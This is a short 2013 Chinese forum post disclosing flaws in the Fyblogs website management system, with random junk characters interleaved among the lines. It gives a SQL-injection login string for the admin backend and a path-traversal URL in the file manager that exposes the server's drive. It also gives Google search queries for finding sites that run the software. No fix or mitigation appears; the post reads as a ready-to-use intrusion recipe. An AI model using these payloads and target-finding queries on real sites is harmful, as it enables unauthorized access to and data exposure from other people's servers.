找回密码
 立即注册
查看: 2712|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'6 ^/ h0 N# Z4 D1 ]7 N

2 c8 f; i; d& P, H8 u+ o后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# a1 s! j" G) A, s; y$ Q2 cadmin/uploadfile.asp?currentFolder=/upfiles/../
& u% H  Q4 C2 o0 A1 a; q6 o5 E
  d- k' H$ v& Y# A" E0 S! D( q漏洞证明:
1 W  ^. S1 y* N6 {
. K$ n1 [& L+ r! r9 }, ]谷歌:inurl:type.asp?id=1 新闻中心
& _, q( x2 b, G, u* V7 \或者 :inurl:download_ok.asp?5 T. d1 z- P- C% l

; u7 D1 r% m, {! u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表